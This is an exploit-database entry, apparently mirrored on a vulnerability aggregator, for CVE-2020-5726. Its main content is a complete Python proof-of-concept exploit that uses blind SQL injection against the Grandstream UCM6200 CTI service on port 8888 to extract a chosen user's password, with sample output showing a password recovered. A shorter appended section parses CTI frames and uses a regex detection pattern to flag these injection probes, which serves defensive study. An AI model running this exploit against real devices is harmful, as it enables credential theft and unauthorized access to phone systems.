Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection

Published: 31 Mar 2020 00:00:00. Reported by: Jacob Baines. Type: exploitdb. Source: www.exploit-db.com. 217 views.


Related entries (source: title, published)

- 0day.today: Grandstream UCM6200 Series CTI Interface - (user_password) SQL Injection Exploit, 31 Mar 2020 00:00
- Circl: CVE-2020-5726, 18 Oct 2024 16:52
- CNVD: Grandstream UCM6200 SQL Injection Vulnerability (CNVD-2020-24401), 31 Mar 2020 00:00
- CVE: CVE-2020-5726, 30 Mar 2020 19:03
- Cvelist: CVE-2020-5726, 30 Mar 2020 19:03
- EUVD: EUVD-2020-26885, 7 Oct 2025 00:30
- exploitpack: Grandstream UCM6200 Series CTI Interface - user_password SQL Injection, 31 Mar 2020 00:00
- NVD: CVE-2020-5726, 30 Mar 2020 20:15
- Packet Storm: Grandstream UCM6200 Series CTI Interface SQL Injection, 31 Mar 2020 00:00
- Prion: Sql injection, 30 Mar 2020 20:15

Code
# Exploit Title: Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection
# Date: 2020-03-30
# Exploit Author: Jacob Baines
# Vendor Homepage: http://www.grandstream.com/
# Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware
# Version: 1.0.20.20 and below
# Tested on: Grandstream UCM6202 1.0.20.20
# CVE : CVE-2020-5726
# Grandstream UCM6200 Series CTI Interface SQL Injection Password Disclosure
# Advisory: https://www.tenable.com/security/research/tra-2020-17
# Sample output:
#
# albinolobster@ubuntu:~$ python3 cti_injection.py --rhost 192.168.2.1 --user lolwat
# [+] Reaching out to 192.168.2.1:8888
# [+] Password length 9
# [+] The password is LabPass1%

import sys
import time
import json
import struct
import socket
import argparse

def send_cti_with_length(sock, payload):
    # CTI frames are a 4-byte big-endian length followed by the request body
    to_send = struct.pack('>I', len(payload))
    to_send = to_send + payload
    sock.sendall(to_send)

    return recv_cti_with_length(sock)

def recv_cti_with_length(sock):
    # The reply uses the same framing: read the length prefix, then the body
    length = sock.recv(4)
    length = struct.unpack('>I', length)[0]
    response = sock.recv(length)
    return response

top_parser = argparse.ArgumentParser(description='')
top_parser.add_argument('--rhost', action="store", dest="rhost",
                        required=True, help="The remote host to connect to")
top_parser.add_argument('--rport', action="store", dest="rport", type=int,
                        help="The remote port to connect to", default=8888)
top_parser.add_argument('--user', action="store", dest="user",
                        required=True, help="The user to brute force")
args = top_parser.parse_args()


print('[+] Reaching out to ' + args.rhost + ':' + str(args.rport))

# Stage 1: recover the password length. Each probe appends a boolean
# condition to the challenge request's user field; a status of 0 in the
# JSON reply means the injected condition was true.
length = 0
while length < 100:

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((args.rhost, args.rport))

    challenge_resp = send_cti_with_length(sock, b"action=challenge&user=" +
                                          args.user.encode('utf-8') +
                                          b"' AND LENGTH(user_password)=" +
                                          str(length).encode('utf-8') + b"--")
    inject_result = json.loads(challenge_resp)

    if (inject_result['status'] == 0):
        break
    else:
        length = length + 1

    sock.close()

if length == 100:
    print('[-] Failed to discover the password length')
    sys.exit(1)

print('[+] Password length', length)

# Stage 2: recover the password one printable character at a time, using the
# same status field as the true/false oracle.
password = ''
while len(password) < length:
    value = 0x20
    while value < 0x80:

        # Double quote and backslash are sent with a leading backslash
        if value == 0x22 or value == 0x5c:
            temp_pass = password + '\\'
            temp_pass = temp_pass + chr(value)
        else:
            temp_pass = password + chr(value)

        temp_pass_len = len(temp_pass)

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((args.rhost, args.rport))

        challenge_resp = send_cti_with_length(sock,
            b"action=challenge&user=" + args.user.encode('utf-8') +
            b"' AND user_password LIKE \'" + temp_pass.encode('utf-8') +
            b"%' AND substr(user_password,1," + str(temp_pass_len).encode('utf-8') +
            b") = '" + temp_pass.encode('utf-8') + b"'--")
        inject_result = json.loads(challenge_resp)

        sock.close()

        if (inject_result['status'] == 0):
            password = temp_pass
            break
        else:
            value = value + 1
            continue

    # No printable character matched at this position
    if value == 0x80:
        print('oh no.')
        sys.exit(0)

print('[+] The password is', password)
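The PoC above drives a boolean-based blind injection through the CTI service's length-prefixed `action=challenge` request. As an added example (not part of the exploit-db entry or of Grandstream's code), the following parses that framing out of a captured byte stream and flags challenge requests whose `user` field carries the probe shape; the sample frames are constructed, and the regex and function names are this example's own.

```python
import re
import struct
from urllib.parse import parse_qs

def frame(body):
    # CTI framing used by the PoC: 4-byte big-endian length, then the request body
    return struct.pack('>I', len(body)) + body

# Constructed sample capture (not from a real device): one benign challenge
# request followed by the two probe shapes the PoC sends
SAMPLE_STREAM = (
    frame(b"action=challenge&user=admin")
    + frame(b"action=challenge&user=lolwat' AND LENGTH(user_password)=9--")
    + frame(b"action=challenge&user=lolwat' AND user_password LIKE 'L%' "
            b"AND substr(user_password,1,1) = 'L'--")
)

# A quote closing the string, a boolean operator, then a function or LIKE
# that reads user_password: the shape of the blind probes above
BLIND_PROBE = re.compile(r"'\s*(AND|OR)\b.*(LENGTH\(|substr\(|LIKE\b)", re.IGNORECASE)

def parse_cti_frames(stream):
    """Split a captured byte stream into CTI request bodies; stop at a truncated frame."""
    frames = []
    offset = 0
    while offset + 4 <= len(stream):
        (length,) = struct.unpack('>I', stream[offset:offset + 4])
        body = stream[offset + 4:offset + 4 + length]
        if len(body) < length:
            break
        frames.append(body)
        offset += 4 + length
    return frames

def suspicious_user_values(stream):
    """Return the user field of each challenge request that carries a probe pattern."""
    hits = []
    for body in parse_cti_frames(stream):
        fields = parse_qs(body.decode('utf-8', errors='replace'), keep_blank_values=True)
        if fields.get('action') != ['challenge']:
            continue
        for user in fields.get('user', []):
            if BLIND_PROBE.search(user):
                hits.append(user)
    return hits

if __name__ == '__main__':
    for user in suspicious_user_values(SAMPLE_STREAM):
        print('[!] injection pattern in CTI challenge user field:', user)
```

A single flagged frame is a strong signal; the length-discovery stage alone produces up to 100 such frames from one client in quick succession, so counting hits per source over a short window makes the alert hard to miss.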

Current as of 31 Mar 2020 00:00

- Vulners AI Score: 7.6 (High risk)
- CVSS 2: 5
- CVSS 3.1: 7.5
- EPSS: 0.06357
- Views: 217